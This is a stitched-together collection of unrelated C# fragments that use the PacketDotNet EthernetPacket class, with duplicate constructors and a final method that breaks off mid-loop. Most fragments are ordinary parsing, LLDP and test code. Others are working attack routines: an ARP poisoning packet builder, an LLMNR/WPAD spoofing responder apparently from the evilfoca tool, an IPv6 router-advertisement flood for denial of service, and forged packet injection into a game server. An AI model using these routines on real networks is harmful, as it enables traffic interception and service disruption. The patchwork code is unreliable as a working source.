private static void PostDashEvent(EthernetPacket packet)
{
if (((ARPPacket)packet.PayloadPacket).SenderProtocolAddress.ToString() != "0.0.0.0")
return;
var macAddress = packet.SourceHwAddress.ToString();
var button = ConfigurationManager.AppSettings.AllKeys.SingleOrDefault(m => m.Contains(macAddress));
if (button == null)
return;
var client = new HttpClient();
var values = new Dictionary<string, string>
{
{"Event", ConfigurationManager.AppSettings[button] },
{"MacAddress", macAddress },
{"CreatedOn", DateTime.Now.ToString() }
};
var data = new FormUrlEncodedContent(values);
client.PostAsync("http://localhost:56719/your/api/url/here", data).ContinueWith(task =>
{
client.Dispose();
});
}
/// <summary>
/// Generate LLDP packet for adapter
/// </summary>
/// <param name="adapter"></param>
private Packet CreateLLDPPacket(NetworkInterface adapter, PacketInfo pinfo)
{
Debug.IndentLevel = 2;
PhysicalAddress MACAddress = adapter.GetPhysicalAddress();
IPInterfaceProperties ipProperties = adapter.GetIPProperties();
IPv4InterfaceProperties ipv4Properties = null; // Ipv4
IPv6InterfaceProperties ipv6Properties = null;// Ipv6
// IPv6
if (adapter.Supports(NetworkInterfaceComponent.IPv6))
{
try
{
ipv6Properties = ipProperties.GetIPv6Properties();
}
catch (NetworkInformationException e)
{
// Adapter doesn't probably have IPv6 enabled
Debug.WriteLine(e.Message, EventLogEntryType.Warning);
}
}
// IPv4
if (adapter.Supports(NetworkInterfaceComponent.IPv4))
{
try
{
ipv4Properties = ipProperties.GetIPv4Properties();
}
catch (NetworkInformationException e)
{
// Adapter doesn't probably have IPv4 enabled
Debug.WriteLine(e.Message, EventLogEntryType.Warning);
}
}
// System description
Dictionary<string, string> systemDescription = new Dictionary<string, string>();
systemDescription.Add("OS", pinfo.OperatingSystem);
systemDescription.Add("Ver", pinfo.OperatingSystemVersion);
systemDescription.Add("User", pinfo.Username);
systemDescription.Add("Uptime", pinfo.Uptime);
// Port description
Dictionary<string, string> portDescription = new Dictionary<string, string>();
// adapter.Description is for example "Intel(R) 82579V Gigabit Network Connection"
// Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\<number>\Description value
portDescription.Add("Vendor", adapter.Description);
/*
adapter.Id is GUID and can be found in several places:
In this example it is "{87423023-7191-4C03-A049-B8E7DBB36DA4}"
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
- \NetworkCards\<number>\ServiceName value (in same tree as adapter.Description!)
- \NetworkList\Nla\Cache\Intranet\<adapter.Id> key
- \NetworkList\Nla\Cache\Intranet\<domain>\<adapter.Id> key
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion
- \NetworkCards\<number>\ServiceName value
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007
{4D36E972-E325-11CE-BFC1-08002BE10318} == Network and Sharing Center -> viewing adapter's "Properties" and selecting "Device class GUID" from dropdown menu
{4D36E972-E325-11CE-BFC1-08002BE10318}\0007 == Network and Sharing Center -> viewing adapter's "Properties" and selecting "Driver key" from dropdown menu
- \NetCfgInstanceId value
- \Linkage\Export value (part of)
- \Linkage\FilterList value (part of)
- \Linkage\RootDevice value
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_1503&SUBSYS_849C1043&REV_06#3&11583659&0&C8#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{87423023-7191-4C03-A049-B8E7DBB36DA4}\SymbolicLink value (part of)
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Network\{ 4D36E972 - E325 - 11CE - BFC1 - 08002BE10318}\{ 87423023 - 7191 - 4C03 - A049 - B8E7DBB36DA4}
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{ACB3F7A0-2E45-4435-854A-A4E120477E1D}\Connection\Name value (part of)
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\{ 87423023 - 7191 - 4C03 - A049 - B8E7DBB36DA4}
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{ ACB3F7A0 - 2E45 - 4435 - 854A - A4E120477E1D}\InterfaceName value (part of)
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\<various names>\Linkage
- \Bind value (part of)
- \Export value (part of)
- \Route value (part of)
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces\Tcpip_{87423023-7191-4C03-A049-B8E7DBB36DA4}
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Psched\Parameters\NdisAdapters\{87423023-7191-4C03-A049-B8E7DBB36DA4}
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RemoteAccess\Interfaces\<number>\InterfaceName value
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Adapters\{87423023-7191-4C03-A049-B8E7DBB36DA4}\IpConfig value (part of)
IPv4 information:
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{87423023-7191-4C03-A049-B8E7DBB36DA4}
IPv6 information:
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters\Interfaces\{87423023-7191-4c03-a049-b8e7dbb36da4}
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WfpLwf\Parameters\NdisAdapters\{87423023-7191-4C03-A049-B8E7DBB36DA4}
*/
portDescription.Add("ID", adapter.Id);
// Gateway
if (ipProperties.GatewayAddresses.Count > 0)
{
portDescription.Add("GW", String.Join(", ", ipProperties.GatewayAddresses.Select(i => i.Address.ToString()).ToArray()));
}
else
{
portDescription.Add("GW", "-");
}
// CIDR
if (ipProperties.UnicastAddresses.Count > 0)
{
int[] mask = ipProperties.UnicastAddresses
.Where(
w => w.IPv4Mask.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork
)
.Select(x => getCIDRFromIPMaskAddress(x.IPv4Mask))
.ToArray()
;
portDescription.Add("CIDR", String.Join(", ", mask));
}
else
{
portDescription.Add("CIDR", "-");
}
// DNS server(s)
if (ipProperties.DnsAddresses.Count > 0)
{
portDescription.Add("DNS", String.Join(", ", ipProperties.DnsAddresses.Select(i => i.ToString()).ToArray()));
}
else
{
portDescription.Add("DNS", "-");
}
// DHCP server
if (ipProperties.DhcpServerAddresses.Count > 0)
{
portDescription.Add("DHCP", String.Join(", ", ipProperties.DhcpServerAddresses.Select(i => i.ToString()).ToArray()));
}
else
{
portDescription.Add("DHCP", "-");
}
// WINS server(s)
if (ipProperties.WinsServersAddresses.Count > 0)
{
portDescription.Add("WINS", String.Join(", ", ipProperties.WinsServersAddresses.Select(i => i.ToString()).ToArray()));
}
// Link speed
portDescription.Add("Speed", ReadableSize(adapter.Speed) + "ps");
// Capabilities enabled
List<CapabilityOptions> capabilitiesEnabled = new List<CapabilityOptions>();
capabilitiesEnabled.Add(CapabilityOptions.StationOnly);
if (ipv4Properties.IsForwardingEnabled)
{
capabilitiesEnabled.Add(CapabilityOptions.Router);
}
ushort expectedSystemCapabilitiesCapability = GetCapabilityOptionsBits(GetCapabilityOptions());
ushort expectedSystemCapabilitiesEnabled = GetCapabilityOptionsBits(capabilitiesEnabled);
// Constuct LLDP packet
LLDPPacket lldpPacket = new LLDPPacket();
lldpPacket.TlvCollection.Add(new ChassisID(ChassisSubTypes.MACAddress, MACAddress));
lldpPacket.TlvCollection.Add(new PortID(PortSubTypes.LocallyAssigned, System.Text.Encoding.UTF8.GetBytes(adapter.Name)));
lldpPacket.TlvCollection.Add(new TimeToLive(120));
lldpPacket.TlvCollection.Add(new PortDescription(CreateTlvString(portDescription)));
lldpPacket.TlvCollection.Add(new SystemName(Environment.MachineName));
lldpPacket.TlvCollection.Add(new SystemDescription(CreateTlvString(systemDescription)));
lldpPacket.TlvCollection.Add(new SystemCapabilities(expectedSystemCapabilitiesCapability, expectedSystemCapabilitiesEnabled));
// Management
var managementAddressObjectIdentifier = "Management";
// Add management IPv4 address(es)
if (null != ipv4Properties)
{
foreach (UnicastIPAddressInformation ip in ipProperties.UnicastAddresses)
{
if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
{
lldpPacket.TlvCollection.Add(new ManagementAddress(new NetworkAddress(ip.Address), InterfaceNumbering.SystemPortNumber, Convert.ToUInt32(ipv4Properties.Index), managementAddressObjectIdentifier));
}
}
}
// Add management IPv6 address(es)
if (null != ipv6Properties)
{
foreach (UnicastIPAddressInformation ip in ipProperties.UnicastAddresses)
{
if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetworkV6)
{
lldpPacket.TlvCollection.Add(new ManagementAddress(new NetworkAddress(ip.Address), InterfaceNumbering.SystemPortNumber, Convert.ToUInt32(ipv6Properties.Index), managementAddressObjectIdentifier));
}
}
}
// == Organization specific TLVs
// Ethernet
lldpPacket.TlvCollection.Add(new OrganizationSpecific(new byte[] { 0x0, 0x12, 0x0f }, 5, new byte[] { 0x5 }));
var expectedOrganizationUniqueIdentifier = new byte[3] { 0, 0, 0 };
var expectedOrganizationSpecificBytes = new byte[] { 0, 0, 0, 0 };
//int orgSubType = 0;
// IPv4 Information:
//if (null != ipv4Properties)
//{
// lldpPacket.TlvCollection.Add((new StringTLV(TLVTypes.OrganizationSpecific, String.Format("IPv4 DHCP: {0}", ipv4Properties.IsDhcpEnabled.ToString()))));
//lldpPacket.TlvCollection.Add(new OrganizationSpecific(expectedOrganizationSpecificBytes, new StringTLV(), System.Text.Encoding.UTF8.GetBytes(String.Format("IPv4 DHCP: {0}", ipv4Properties.IsDhcpEnabled.ToString()))));
//}
// End of LLDP packet
lldpPacket.TlvCollection.Add(new EndOfLLDPDU());
if (0 == lldpPacket.TlvCollection.Count)
{
throw new Exception("Couldn't construct LLDP TLVs.");
}
if (lldpPacket.TlvCollection.Last().GetType() != typeof(EndOfLLDPDU))
{
throw new Exception("Last TLV must be type of 'EndOfLLDPDU'!");
}
foreach (TLV tlv in lldpPacket.TlvCollection)
{
Debug.WriteLine(tlv.ToString(), EventLogEntryType.Information);
}
// Generate packet
Packet packet = new EthernetPacket(MACAddress, destinationHW, EthernetPacketType.LLDP);
packet.PayloadData = lldpPacket.Bytes;
return packet;
}
public void BinarySerialization()
{
var dev = new CaptureFileReaderDevice("../../CaptureFiles/tcp.pcap");
dev.Open();
RawCapture rawCapture;
bool foundEthernet = false;
while ((rawCapture = dev.GetNextPacket()) != null)
{
var ethernetPacket = new EthernetPacket(new ByteArraySegment(rawCapture.Data));
if (ethernetPacket == null)
{
continue;
}
foundEthernet = true;
var memoryStream = new MemoryStream();
BinaryFormatter serializer = new BinaryFormatter();
serializer.Serialize(memoryStream, ethernetPacket);
memoryStream.Seek (0, SeekOrigin.Begin);
BinaryFormatter deserializer = new BinaryFormatter();
EthernetPacket fromFile = (EthernetPacket)deserializer.Deserialize(memoryStream);
Assert.AreEqual(ethernetPacket.Bytes, fromFile.Bytes);
Assert.AreEqual(ethernetPacket.BytesHighPerformance.Bytes, fromFile.BytesHighPerformance.Bytes);
Assert.AreEqual(ethernetPacket.BytesHighPerformance.BytesLength, fromFile.BytesHighPerformance.BytesLength);
Assert.AreEqual(ethernetPacket.BytesHighPerformance.Length, fromFile.BytesHighPerformance.Length);
Assert.AreEqual(ethernetPacket.BytesHighPerformance.NeedsCopyForActualBytes, fromFile.BytesHighPerformance.NeedsCopyForActualBytes);
Assert.AreEqual(ethernetPacket.BytesHighPerformance.Offset, fromFile.BytesHighPerformance.Offset);
Assert.AreEqual(ethernetPacket.Color, fromFile.Color);
Assert.AreEqual(ethernetPacket.DestinationHwAddress, fromFile.DestinationHwAddress);
Assert.AreEqual(ethernetPacket.Header, fromFile.Header);
Assert.AreEqual(ethernetPacket.ParentPacket, fromFile.ParentPacket);
Assert.AreEqual(ethernetPacket.PayloadData, fromFile.PayloadData);
Assert.AreEqual(ethernetPacket.SourceHwAddress, fromFile.SourceHwAddress);
Assert.AreEqual(ethernetPacket.Type, fromFile.Type);
}
dev.Close();
Assert.IsTrue(foundEthernet, "Capture file contained no Ethernet packets");
}
/// <summary>
/// Parse bytes into a packet
/// </summary>
/// <param name="LinkLayer">
/// A <see cref="LinkLayers"/>
/// </param>
/// <param name="PacketData">
/// A <see cref="System.Byte"/>
/// </param>
/// <returns>
/// A <see cref="Packet"/>
/// </returns>
public static Packet ParsePacket(LinkLayers LinkLayer,
byte[] PacketData)
{
Packet p;
var bas = new ByteArraySegment(PacketData);
switch (LinkLayer)
{
case LinkLayers.Ethernet:
p = new EthernetPacket(bas);
break;
case LinkLayers.LinuxSLL:
p = new LinuxSLLPacket(bas);
break;
case LinkLayers.Ppp:
p = new PPPPacket(bas);
break;
case LinkLayers.Ieee80211:
p = new Ieee80211MacFrame(bas);
break;
case LinkLayers.Ieee80211_Radio:
p = new Ieee80211RadioPacket(bas);
break;
default:
throw new System.NotImplementedException("LinkLayer of " + LinkLayer + " is not implemented");
}
return(p);
}
public static void Main(string[] args)
{
ushort tcpSourcePort = 123;
ushort tcpDestinationPort = 321;
var tcpPacket = new TcpPacket(tcpSourcePort, tcpDestinationPort);
var ipSourceAddress = System.Net.IPAddress.Parse("192.168.1.1");
var ipDestinationAddress = System.Net.IPAddress.Parse("192.168.1.2");
var ipPacket = new IPv4Packet(ipSourceAddress, ipDestinationAddress);
var sourceHwAddress = "90-90-90-90-90-90";
var ethernetSourceHwAddress = System.Net.NetworkInformation.PhysicalAddress.Parse(sourceHwAddress);
var destinationHwAddress = "80-80-80-80-80-80";
var ethernetDestinationHwAddress = System.Net.NetworkInformation.PhysicalAddress.Parse(destinationHwAddress);
// NOTE: using EthernetPacketType.None to illustrate that the ethernet
// protocol type is updated based on the packet payload that is
// assigned to that particular ethernet packet
var ethernetPacket = new EthernetPacket(ethernetSourceHwAddress,
ethernetDestinationHwAddress,
EthernetPacketType.None);
// Now stitch all of the packets together
ipPacket.PayloadPacket = tcpPacket;
ethernetPacket.PayloadPacket = ipPacket;
// and print out the packet to see that it looks just like we wanted it to
Console.WriteLine(ethernetPacket.ToString());
}
/// <summary>
/// Returns the embedded Wake-On-LAN packet
/// or null if there is none
/// </summary>
/// <returns>
/// A Wake-On-LAN packet
/// </returns>
public static WakeOnLanPacket GetEncapsulated(Packet p)
{
if (p is EthernetPacket)
{
var payload = EthernetPacket.GetInnerPayload((InternetLinkLayerPacket)p);
if (((EthernetPacket)p).Type == EthernetPacketType.WakeOnLan)
{
var payloadBas = new ByteArraySegment(p.PayloadData);
if (WakeOnLanPacket.IsValid(payloadBas))
{
return(new WakeOnLanPacket(payloadBas));
}
}
if (payload != null && payload is IpPacket)
{
var innerPayload = payload.PayloadPacket;
if ((innerPayload != null) &&
(innerPayload.PayloadData != null) &&
(innerPayload is UdpPacket))
{
var innerPayloadBas = new ByteArraySegment(innerPayload.PayloadData);
if (WakeOnLanPacket.IsValid(innerPayloadBas))
{
return(new WakeOnLanPacket(innerPayloadBas));
}
}
}
}
return(null);
}
public void SendSupplyBoxOpen()
{
byte[] packet = new byte[]
{
0x69, 0x04, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0xEC, 0x04, 0x8B, 0x11, 0x17, 0x00, 0x00, 0x00,
0xEC, 0x04, 0x00, 0x1F, 0xF7, 0x51, 0x8D, 0x0A, 0x00, 0x61, 0x00, 0x73, 0x00, 0x64, 0x00, 0x66,
0x00, 0x00, 0x00
};
packet[4] = (byte)((int)(packet[4] + 10));
Gunz2Packet.Encrypt(packet, 12, (uint)packet.Length - 12, _cryptKey);
var checksum = Gunz2Packet.CalculateChecksum(packet, packet.Length);
Buffer.BlockCopy(BitConverter.GetBytes(checksum), 0, packet, 10, 2);
var tcp = new TcpPacket(_srcPort, 20100);
var ip = new IPv4Packet(_srcIP, _destIP);
var ether = new EthernetPacket(_srcPhsyical, _destPhysical, EthernetPacketType.None);
tcp.Ack = true;
tcp.Psh = true;
tcp.PayloadData = packet;
ip.PayloadPacket = tcp;
ether.PayloadPacket = ip;
Console.WriteLine(ether);
_device.SendPacket(ether);
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="bas">A <see cref="ByteArraySegment" /></param>
/// <param name="parentPacket">The parent packet.</param>
public GREPacket(ByteArraySegment bas, Packet parentPacket)
{
// slice off the header portion
// ReSharper disable once UseObjectOrCollectionInitializer
Header = new ByteArraySegment(bas);
Header.Length = GREFields.FlagsLength + GREFields.ProtocolLength;
if (HasCheckSum)
{
Header.Length += GREFields.ChecksumLength;
}
if (HasReserved)
{
Header.Length += GREFields.ReservedLength;
}
if (HasKey)
{
Header.Length += GREFields.KeyLength;
}
if (HasSequence)
{
Header.Length += GREFields.SequenceLength;
}
// parse the encapsulated bytes
PayloadPacketOrData = new Lazy <PacketOrByteArraySegment>(() => EthernetPacket.ParseEncapsulatedBytes(Header, Protocol));
ParentPacket = parentPacket;
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="bas">
/// A <see cref="ByteArraySegment"/>
/// </param>
public GREPacket(ByteArraySegment bas, Packet ParentPacket)
{
// slice off the header portion
header = new ByteArraySegment(bas);
header.Length = GREFields.FlagsLength + GREFields.ProtocolLength;
if (HasCheckSum)
{
header.Length += GREFields.ChecksumLength;
}
if (HasReserved)
{
header.Length += GREFields.ReservedLength;
}
if (HasKey)
{
header.Length += GREFields.KeyLength;
}
if (HasSequence)
{
header.Length += GREFields.SequenceLength;
}
// parse the encapsulated bytes
payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(header, Protocol);
this.ParentPacket = ParentPacket;
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="bas">
/// A <see cref="ByteArraySegment" />
/// </param>
public LinuxSLLPacket(ByteArraySegment bas)
{
this.header = new ByteArraySegment(bas);
this.header.Length = LinuxSLLFields.SLLHeaderLength;
// parse the payload via an EthernetPacket method
this.payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(this.header, this.EthernetProtocolType);
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="bas">
/// A <see cref="ByteArraySegment" />
/// </param>
public LinuxSLLPacket(ByteArraySegment bas)
{
Header = new ByteArraySegment(bas);
Header.Length = LinuxSLLFields.SLLHeaderLength;
// parse the payload via an EthernetPacket method
PayloadPacketOrData = new Lazy <PacketOrByteArraySegment>(() => EthernetPacket.ParseEncapsulatedBytes(Header,
EthernetProtocolType));
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="bas">
/// A <see cref="ByteArraySegment" />
/// </param>
public Ieee8021QPacket(ByteArraySegment bas)
{
// set the header field, header field values are retrieved from this byte array
this.header = new ByteArraySegment(bas);
this.header.Length = Ieee8021QFields.HeaderLength;
// parse the payload via an EthernetPacket method
this.payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(this.header, this.Type);
}
public static EthernetPacket CreateEthernetPacket(PhysicalAddress sourceAddress,
PhysicalAddress destinationAddress, Packet payloapPacket)
{
var result = new EthernetPacket(sourceAddress, destinationAddress, EthernetPacketType.IpV4)
{
PayloadPacket = payloapPacket
};
return result;
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="bas">
/// A <see cref="ByteArraySegment" />
/// </param>
public Ieee8021QPacket(ByteArraySegment bas)
{
// set the header field, header field values are retrieved from this byte array
Header = new ByteArraySegment(bas);
Header.Length = Ieee8021QFields.HeaderLength;
// parse the payload via an EthernetPacket method
PayloadPacketOrData = new Lazy <PacketOrByteArraySegment>(() => EthernetPacket.ParseEncapsulatedBytes(Header,
Type), LazyThreadSafetyMode.PublicationOnly);
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="bas">
/// A <see cref="ByteArraySegment"/>
/// </param>
public Ieee8021QPacket(ByteArraySegment bas)
{
// set the header field, header field values are retrieved from this byte array
header = new ByteArraySegment(bas);
RandomUtils.EnsurePacketLength(this, Ieee8021QFields.HeaderLength, header.Length);
header.Length = Ieee8021QFields.HeaderLength;
// parse the payload via an EthernetPacket method
payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(header,
Type);
}
public PacketWrapper(uint id, IPv4Packet ipv4, ushort sourcePort, ushort destPort, ConanPacket conanPacket)
{
Id = id;
ConanPacket = conanPacket;
EthernetPacket = new EthernetPacket(NullAddress, NullAddress, EthernetPacketType.IpV4)
{
PayloadPacket = ipv4
};
Ipv4Packet.PayloadPacket = new UdpPacket(sourcePort, destPort); // conandata
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="byteArraySegment">
/// A <see cref="ByteArraySegment" />
/// </param>
public LinuxSllPacket(ByteArraySegment byteArraySegment)
{
Header = new ByteArraySegment(byteArraySegment)
{
Length = LinuxSllFields.SLLHeaderLength
};
// parse the payload via an EthernetPacket method
PayloadPacketOrData = new LazySlim <PacketOrByteArraySegment>(() => EthernetPacket.ParseNextSegment(Header,
EthernetProtocolType));
}
public static EthernetPacket GenerateResponseArpPoison(PhysicalAddress localMac, PhysicalAddress mac1, IPAddress ip1, IPAddress ip2)
{
EthernetPacket ethernet;
ethernet = new EthernetPacket(localMac, mac1, EthernetPacketType.Arp);
ethernet.PayloadPacket = new ARPPacket(ARPOperation.Response,
mac1,
ip1,
localMac,
ip2);
return ethernet;
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="byteArraySegment">
/// A <see cref="ByteArraySegment" />
/// </param>
public LinuxSllPacket(ByteArraySegment byteArraySegment)
{
Header = new ByteArraySegment(byteArraySegment)
{
Length = LinuxSllFields.SLLHeaderLength
};
// parse the payload via an EthernetPacket method
PayloadPacketOrData = new Lazy <PacketOrByteArraySegment>(() => EthernetPacket.ParseNextSegment(Header,
EthernetProtocolType),
LazyThreadSafetyMode.PublicationOnly);
}
/// <summary>
/// Constructor
/// </summary>
/// <param name="byteArraySegment">
/// A <see cref="ByteArraySegment" />
/// </param>
public Ieee8021QPacket(ByteArraySegment byteArraySegment)
{
// set the header field, header field values are retrieved from this byte array
Header = new ByteArraySegment(byteArraySegment)
{
Length = Ieee8021QFields.HeaderLength
};
// parse the payload via an EthernetPacket method
PayloadPacketOrData = new LazySlim <PacketOrByteArraySegment>(() => EthernetPacket.ParseNextSegment(Header,
Type));
}
public void device_OnPacketArrival(object sender, CaptureEventArgs eCap)
{
try
{
ByteArraySegment raw = new ByteArraySegment(eCap.Packet.Data);
EthernetPacket ethernetPacket = new EthernetPacket(raw);
IpPacket ipPacket = (IpPacket)ethernetPacket.PayloadPacket;
TcpPacket tcp = (TcpPacket)ipPacket.PayloadPacket;
if (ipPacket != null && tcp != null)
{
string destIp = ipPacket.DestinationAddress.ToString();
if (destIp == captureIp)
{
//Client -> Server
MainWindow.pp.AppendClientData(tcp.PayloadData);
// ReSharper disable CSharpWarnings::CS0642
while (MainWindow.pp.ProcessClientData()) ;
// ReSharper restore CSharpWarnings::CS0642
}
else
{
//Do a check for a new game Connection. Each handshake starts with a dword 1 packet from the server.
byte[] test = { 0x01, 0x00, 0x00, 0x00 };
if (StructuralComparisons.StructuralEqualityComparer.Equals(test, tcp.PayloadData))
{
//New Connection detected.
//We should reset State and Security Info
MainWindow.pp.Init();
MainWindow.pp.State = 0;
MainWindow.ClearPackets();
}
//Sever -> Client
MainWindow.pp.AppendServerData(tcp.PayloadData);
// ReSharper disable CSharpWarnings::CS0642
while (MainWindow.pp.ProcessServerData()) ;
// ReSharper restore CSharpWarnings::CS0642
}
}
}
catch (Exception ex)
{
MainWindow.SetText("device_OnPacketArrival failure. \n Message:" + ex);
}
}
public void TestOptimalByteRetrieval()
{
var ethernetPacket = BuildNonContiguousEthernetPacket();
// now extract a contiguous series of bytes
var contiguousBytes = ethernetPacket.Bytes;
// and re-parse the packet
var contiguousEthernetPacket = new EthernetPacket(new PacketDotNet.Utils.ByteArraySegment(contiguousBytes));
// used to make sure we get the same byte[] reference returned each time
// because thats what we expect
byte[] theByteArray = null;
// store the logging value
var oldThreshold = LoggingConfiguration.GlobalLoggingLevel;
// disable logging to improve performance
LoggingConfiguration.GlobalLoggingLevel = log4net.Core.Level.Off;
// now benchmark retrieving the byte[] for several seconds
var startTime = DateTime.Now;
var endTime = startTime.Add(new TimeSpan(0, 0, 2));
int testRuns = 0;
while(DateTime.Now < endTime)
{
var theBytes = contiguousEthernetPacket.Bytes;
// make sure that we always get back the same reference
// for the byte[]
if(theByteArray == null)
{
theByteArray = theBytes;
} else
{
Assert.AreSame(theByteArray, theBytes);
}
testRuns++;
}
// update the actual end of the loop
endTime = DateTime.Now;
// restore logging
LoggingConfiguration.GlobalLoggingLevel = oldThreshold;
var rate = new Rate(startTime, endTime, testRuns, "Test runs");
Console.WriteLine(rate.ToString());
}
/// <summary>
/// Parse bytes into a packet
/// </summary>
/// <param name="LinkLayer">
/// A <see cref="LinkLayers"/>
/// </param>
/// <param name="PacketData">
/// A <see cref="System.Byte"/>
/// </param>
/// <returns>
/// A <see cref="Packet"/>
/// </returns>
public static Packet ParsePacket(LinkLayers LinkLayer,
byte[] PacketData)
{
Packet p;
var bas = new ByteArraySegment(PacketData);
log.DebugFormat("LinkLayer {0}", LinkLayer);
switch (LinkLayer)
{
case LinkLayers.Ethernet:
p = new EthernetPacket(bas);
break;
case LinkLayers.LinuxSLL:
p = new LinuxSLLPacket(bas);
break;
case LinkLayers.Null:
p = new NullPacket(bas);
break;
case LinkLayers.Ppp:
p = new PPPPacket(bas);
break;
case LinkLayers.Ieee80211:
p = Ieee80211.MacFrame.ParsePacket(bas);
break;
case LinkLayers.Ieee80211_Radio:
p = new Ieee80211.RadioPacket(bas);
break;
case LinkLayers.PerPacketInformation:
p = new Ieee80211.PpiPacket(bas);
break;
case LinkLayers.Raw:
p = new RawIPPacket(bas);
break;
default:
throw new System.NotImplementedException("LinkLayer of " + LinkLayer + " is not implemented");
}
return(p);
}
public void GenerateLLMNRResponse(Packet packet)
{
try
{
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData);
if (llmnr.Query.Name.ToLower().Equals("wpad") && llmnr.Query.Type.Value == LLMNR.DNSType.A)
{
WinPcapDevice dev = Program.CurrentProject.data.GetDevice();
IPAddress ip = Program.CurrentProject.data.GetIPv4FromDevice(dev);
byte[] ipv4Addr = ip.GetAddressBytes();
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.A,
RData = ipv4Addr,
RDLength = (short)ipv4Addr.Length,
TTL = 12
});
llmnr.IsResponse = true;
EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV4);
IPv4Packet ipv4Dns = new IPv4Packet(ip, ((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv4Dns.PayloadPacket = udpDns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv4Dns.UpdateIPChecksum();
ipv4Dns.UpdateCalculatedValues();
ethDns.PayloadPacket = ipv4Dns;
Program.CurrentProject.data.SendPacket(ethDns);
}
}
catch (Exception)
{
}
}
/// <summary>
/// Parse bytes into a packet
/// </summary>
/// <param name="linkLayer">
/// A <see cref="LinkLayers" />
/// </param>
/// <param name="packetData">
/// A <see cref="System.Byte" />
/// </param>
/// <returns>
/// A <see cref="Packet" />
/// </returns>
public static Packet ParsePacket(LinkLayers linkLayer, byte[] packetData)
{
Packet p;
var bas = new ByteArraySegment(packetData);
Log.DebugFormat("LinkLayer {0}", linkLayer);
switch (linkLayer)
{
case LinkLayers.Ethernet:
p = new EthernetPacket(bas);
break;
case LinkLayers.LinuxSLL:
p = new LinuxSLLPacket(bas);
break;
case LinkLayers.Ppp:
p = new PPPPacket(bas);
break;
case LinkLayers.Ieee80211:
p = MacFrame.ParsePacket(bas);
break;
case LinkLayers.Ieee80211_Radio:
p = new RadioPacket(bas);
break;
case LinkLayers.PerPacketInformation:
p = new PpiPacket(bas);
break;
//http://sourceforge.net/p/packetnet/patches/1/
case LinkLayers.Raw:
var ipVer = (packetData[0] & 0xf0) >> 4;
p = (ipVer == 4)? new IPv4Packet(bas) : new IPv6Packet(bas) as Packet;
break;
default:
throw new NotImplementedException("LinkLayer of " + linkLayer + " is not implemented");
}
return(p);
}
private void Attack()
{
while (true)
{
try
{
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DoSSLAAC && A.attackStatus == Data.AttackStatus.Attacking))
{
if (attack is evilfoca.Data.DoSSLAACAttack)
{
for (int i = 0; i < NumberOfRouterAdvertisement; i++)
{
//MAC del equipo atacado
PhysicalAddress MACdst = (attack as evilfoca.Data.DoSSLAACAttack).t1.mac;
//IP de origen aleatoria pero siempre de vinculo local
IPAddress IPsrc = GetRandomLocalIPv6();
//IP atacada
IPAddress IPdst = (attack as evilfoca.Data.DoSSLAACAttack).t1.ip;
ICMPv6Packet routerAdvertisement = new ICMPv6Packet(new ByteArraySegment(new ICMPv6.NeighborRouterAdvertisement(MACsrc, GetRandomPrefix(), true).GetBytes()));
